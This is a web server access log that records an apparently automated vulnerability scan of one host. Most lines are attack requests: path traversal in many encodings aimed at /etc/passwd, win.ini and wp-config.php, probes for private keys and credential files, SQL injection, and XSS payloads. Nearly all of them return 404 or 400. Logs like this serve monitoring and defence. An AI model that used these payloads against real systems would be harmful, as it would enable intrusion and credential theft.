195.164.49.69 - - [18/Nov/2024:22:20:47 +0000] GET /.ssh/id_rsa_4096 HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:20:47 +0000] GET /sdc.iopan.pl:80.key HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:20:47 +0000] GET /sdc.iopan.pl:80.pem HTTP/1.1 404 1093
83.212.98.101 - - [18/Nov/2024:22:20:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:22:21:21 +0000] POST /controller/login.php?acao=autenticar HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:21:22 +0000] GET /slr/application/configs/application.ini HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:22:21:30 +0000] GET /cms/application/configs/application.ini HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:22:21:31 +0000] GET /application/configs/application.ini HTTP/1.1 404 1117
195.164.49.69 - - [18/Nov/2024:22:21:31 +0000] GET /admin/configs/application.ini HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:22:21:31 +0000] GET /application.ini HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:21:32 +0000] GET /aplicacao/application/configs/application.ini HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:22:21:32 +0000] GET /cloudexp/application/configs/application.ini HTTP/1.1 404 1130
195.164.49.69 - - [18/Nov/2024:22:21:35 +0000] GET /moto/application/configs/application.ini HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:22:21:35 +0000] GET /Partners/application/configs/application.ini HTTP/1.1 404 1130
195.164.49.69 - - [18/Nov/2024:22:21:35 +0000] GET /radio/application/configs/application.ini HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:22:21:35 +0000] GET /seminovos/application/configs/application.ini HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:22:21:35 +0000] GET /shop/application/configs/application.ini HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:22:21:35 +0000] GET /site_cg/application/configs/application.ini HTTP/1.1 404 1129
195.164.49.69 - - [18/Nov/2024:22:21:47 +0000] GET /N0t4xist*~1*/a.aspx HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:21:49 +0000] POST /api/v1/users/signup HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:21:51 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:21:55 +0000] GET /Reports/Pages/Folder.aspx HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:21:57 +0000] GET /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:21:58 +0000] GET /etc/passwd HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:21:58 +0000] GET /..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:21:58 +0000] GET /..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:21:58 +0000] GET /..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:21:58 +0000] GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:21:58 +0000] GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:21:58 +0000] GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:21:58 +0000] GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:21:58 +0000] GET /static/..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:21:59 +0000] GET /static/..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:21:59 +0000] GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:21:59 +0000] GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:21:59 +0000] GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:21:59 +0000] GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:21:59 +0000] GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:21:59 +0000] GET /./../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:21:59 +0000] GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1 404 1136
195.164.49.69 - - [18/Nov/2024:22:21:59 +0000] GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:22:00 +0000] GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:22:00 +0000] GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1 404 1136
195.164.49.69 - - [18/Nov/2024:22:22:00 +0000] GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1 404 1224
195.164.49.69 - - [18/Nov/2024:22:22:00 +0000] GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1 404 1165
195.164.49.69 - - [18/Nov/2024:22:22:00 +0000] GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:22:22:00 +0000] GET /..///////..////..//////etc/passwd HTTP/1.1 400 1160
83.212.98.101 - - [18/Nov/2024:22:22:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:22:22:47 +0000] GET /%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1 404 1211
195.164.49.69 - - [18/Nov/2024:22:22:49 +0000] GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1 404 1141
195.164.49.69 - - [18/Nov/2024:22:22:49 +0000] GET /./../../../../../../../../../../windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:22:50 +0000] GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1 404 1170
195.164.49.69 - - [18/Nov/2024:22:22:50 +0000] GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:22:50 +0000] GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1 404 1141
195.164.49.69 - - [18/Nov/2024:22:22:50 +0000] GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:22:50 +0000] GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini HTTP/1.1 404 1229
195.164.49.69 - - [18/Nov/2024:22:22:50 +0000] GET /?redirect=..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:22:50 +0000] GET /?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:22:50 +0000] GET /?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:22:50 +0000] GET /..///////..////..//////windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:22:51 +0000] GET /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:22:51 +0000] GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini HTTP/1.1 404 1144
195.164.49.69 - - [18/Nov/2024:22:22:51 +0000] GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00 HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:22:51 +0000] GET /index.php?page=windows/win.ini HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:22:51 +0000] GET /index.php?page=windows/win.ini%00 HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:22:51 +0000] GET /index.php?page=../../windows/win.ini HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:22:51 +0000] GET /index.php?page=....//....//windows/win.ini HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:22:51 +0000] GET /.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:22:51 +0000] GET /.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/windows/win.ini HTTP/1.1 404 1226
195.164.49.69 - - [18/Nov/2024:22:22:52 +0000] GET /../../../../../../../../../windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:23:34 +0000] POST /Org/service/Service.asmx/GetUserByEmployeeCode HTTP/1.1 404 1132
195.164.49.69 - - [18/Nov/2024:22:23:36 +0000] POST /direct/polling/CommandsPolling.php HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:22:23:42 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:23:44 +0000] GET /api/imageProxy?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:23:47 +0000] GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1 404 1129
195.164.49.69 - - [18/Nov/2024:22:23:50 +0000] GET /config/fillbacksetting.php?DontCheckLogin=1&action=delete&id=-99;WAITFOR+DELAY+'0:0:6'-- HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:23:52 +0000] GET /ebvp/infopub/show_download_content;.js?id=1';WAITFOR+DELAY+'0:0:6'-- HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:22:23:54 +0000] GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1 404 1141
195.164.49.69 - - [18/Nov/2024:22:23:56 +0000] GET /?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image HTTP/1.1 200 11204
- - - [18/Nov/2024:22:23:58 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:22:24:11 +0000] GET /jwt/private.pem HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:24:11 +0000] GET /var/jwt/private.pem HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:24:11 +0000] GET /private.pem HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:24:11 +0000] GET /ssl.txt HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:22:24:11 +0000] GET /ssl_key.txt HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:24:11 +0000] GET /certificates/sdc.iopan.pl.pfx HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:24:12 +0000] GET /certificates/sdc.iopan.pl.p12 HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:24:12 +0000] GET /ssl/sdc.iopan.pl.pem HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:24:12 +0000] GET /ssl/sdc.iopan.pl_key.txt HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:24:12 +0000] GET /cert/sdc.iopan.pl_key.txt HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:24:12 +0000] GET /cert/iopan.pl_key.txt HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:22:24:12 +0000] GET /cert/sdc.iopan.pl.txt HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:22:24:12 +0000] GET /ssl/private/sdc.iopan.pl_key.pem HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:22:24:12 +0000] GET /certs/sdc.iopan.pl_private.key HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:22:24:12 +0000] GET /certs/sdc.iopan.pl.key HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:22:24:13 +0000] GET /certificates/sdc.iopan.pl_priv.pem HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:22:24:13 +0000] GET /certificates/sdc.iopan.pl_privkey.pem HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:22:24:13 +0000] GET /certs/sdc.iopan.pl.pem HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:22:24:13 +0000] GET /private/sdc.iopan.pl.key HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:24:13 +0000] GET /keys/sdc.iopan.pl.pem HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:22:24:40 +0000] GET /*~1*/a.aspx HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:24:41 +0000] GET /api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();-- HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:24:44 +0000] GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:24:46 +0000] GET /_debugbar/open HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:24:50 +0000] GET /ReportServer/Pages/Folder.aspx HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:22:24:51 +0000] GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1 404 1139
195.164.49.69 - - [18/Nov/2024:22:24:52 +0000] GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00 HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:24:52 +0000] GET /index.php?page=etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:24:52 +0000] GET /index.php?page=etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:24:52 +0000] GET /index.php?page=../../etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:24:52 +0000] GET /index.php?page=....//....//etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:24:52 +0000] GET /../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:25:06 +0000] GET /go/add-on/business-continuity/api/plugin?folderName&pluginName=../../../etc/passwd HTTP/1.1 404 1130
195.164.49.69 - - [18/Nov/2024:22:25:08 +0000] GET /install.php?profile=default HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:25:10 +0000] GET /setup.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:25:11 +0000] GET /Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','999999999')),3,32) HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:22:25:13 +0000] GET /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:25:15 +0000] GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1169
195.164.49.69 - - [18/Nov/2024:22:25:17 +0000] GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1130
195.164.49.69 - - [18/Nov/2024:22:25:19 +0000] GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1 404 1196
195.164.49.69 - - [18/Nov/2024:22:25:23 +0000] GET /css/eonweb.css HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:25:25 +0000] GET /api/moduleInformation HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:22:25:27 +0000] GET /parameters.yml HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:25:29 +0000] GET /install/ HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:25:31 +0000] GET /index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:25:33 +0000] GET /setup/index.php HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:25:35 +0000] GET /lucee/admin/web.cfm HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:25:37 +0000] GET /ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:25:39 +0000] GET /resource/file%3a///etc/passwd/ HTTP/1.1 404 1128
195.164.49.69 - - [18/Nov/2024:22:25:41 +0000] OPTIONS /N0t4xist*~1*/a.aspx HTTP/1.1 200 -
195.164.49.69 - - [18/Nov/2024:22:25:43 +0000] GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:25:45 +0000] GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:25:47 +0000] GET /mnt/overlay/dam/gui/content/assets/metadataeditor.external.html?item=$%7b985678*880464%7d HTTP/1.1 404 1161
195.164.49.69 - - [18/Nov/2024:22:25:49 +0000] GET /tshirtecommerce/fonts.php?name=2&type=./../index.php HTTP/1.1 404 1103
83.212.98.101 - - [18/Nov/2024:22:25:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:22:25:51 +0000] GET /api/sitecore/Sitecore.Mvc.DeviceSimulator.Controllers.SimulatorController,Sitecore.Mvc.DeviceSimulator.dll/Preview?previewPath=/App_Data/license.xml HTTP/1.1 404 1200
195.164.49.69 - - [18/Nov/2024:22:25:53 +0000] GET /_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E HTTP/1.1 404 1150
- - - [18/Nov/2024:22:25:55 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:22:25:57 +0000] GET /core/install.php HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:25:59 +0000] GET /client/cdnfile/1C/Windows/win.ini?windows HTTP/1.1 404 1123
195.164.49.69 - - [18/Nov/2024:22:26:01 +0000] GET /Api/portal/elementEcodeAddon/getSqlData?sql HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:22:26:03 +0000] GET /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:26:05 +0000] GET /cgi-bin/config.exp HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:26:07 +0000] GET /api/v1/confup?mode&uid=1'%20UNION%20select%201,2,3,4,sqlite_version();-- HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:26:09 +0000] GET /api/v1/ndconfig?mode&uid=1'%20UNION%20select%201,2,3,sqlite_version();-- HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:26:11 +0000] GET /filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd HTTP/1.1 404 1128
195.164.49.69 - - [18/Nov/2024:22:26:13 +0000] GET /index.php?content=../../../../../../../../etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:26:15 +0000] GET /app/config/parameters.yml HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:26:17 +0000] GET /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php HTTP/1.1 404 1142
195.164.49.69 - - [18/Nov/2024:22:26:19 +0000] GET /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:26:21 +0000] GET /install/index.php HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:26:23 +0000] GET /lucee/admin/server.cfm HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:26:25 +0000] GET /../../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:26:27 +0000] GET /wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:26:29 +0000] GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:26:30 +0000] OPTIONS /*~1*/a.aspx HTTP/1.1 200 -
195.164.49.69 - - [18/Nov/2024:22:26:32 +0000] GET /api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:26:35 +0000] POST /wp-json/igd/v1/get-users-data HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:22:26:37 +0000] GET /res/../admin/diagnostic.jsp HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:22:26:39 +0000] GET /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:26:40 +0000] GET /common/download/resource?resource=/profile/../../../../etc/passwd HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:22:26:42 +0000] GET /exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:26:44 +0000] GET /scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:26:46 +0000] GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:22:26:48 +0000] GET /client/cdnfile/C/etc/passwd?linux HTTP/1.1 404 1117
195.164.49.69 - - [18/Nov/2024:22:26:50 +0000] GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true HTTP/1.1 404 1209
195.164.49.69 - - [18/Nov/2024:22:26:52 +0000] GET /crx/explorer/nodetypes/index.jsp HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:22:26:54 +0000] GET //content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1 404 1184
195.164.49.69 - - [18/Nov/2024:22:26:56 +0000] GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:22:26:58 +0000] GET /sabnzbd/wizard/ HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:27:00 +0000] GET /index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:27:02 +0000] GET ///////../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:27:04 +0000] GET /parameters.yml.dist HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:27:06 +0000] GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1 404 1102
- - - [18/Nov/2024:22:27:08 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:22:27:10 +0000] GET /install/make-config.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:27:12 +0000] GET /config/getuser?index=0 HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:27:16 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:27:16 +0000] GET /.ftpconfig HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:27:18 +0000] GET /sftp.json HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:27:20 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:27:22 +0000] GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1 404 1142
195.164.49.69 - - [18/Nov/2024:22:27:24 +0000] GET /api/snapshots/:key HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:22:27:26 +0000] GET /.well-known/acme-challenge/../../admin/diagnostic.jsp HTTP/1.1 404 1147
195.164.49.69 - - [18/Nov/2024:22:27:28 +0000] GET /msa/../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:27:30 +0000] GET /common/download/resource?resource=/profile/../../../../Windows/win.ini HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:22:27:32 +0000] GET /ftpsync.settings HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:27:34 +0000] GET /install.php HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:27:36 +0000] GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:22:27:38 +0000] GET /main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1 404 1088
83.212.98.101 - - [18/Nov/2024:22:27:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:22:27:40 +0000] GET /servlets/FetchFile?fileName=../../../etc/passwd HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:27:43 +0000] GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1 404 1149
195.164.49.69 - - [18/Nov/2024:22:27:44 +0000] GET /..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:27:46 +0000] GET /glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:22:27:48 +0000] GET /wizard/ HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:27:50 +0000] GET /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php HTTP/1.1 404 1157
195.164.49.69 - - [18/Nov/2024:22:27:52 +0000] GET /static///////../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:27:54 +0000] GET /app/config/parameters.yml.dist HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:22:27:56 +0000] GET /getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:27:58 +0000] GET /.config/sftp.json HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:28:00 +0000] GET /update/../admin/diagnostic.jsp HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:22:28:02 +0000] GET /main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:28:04 +0000] GET ///../app.js HTTP/1.1 400 1160
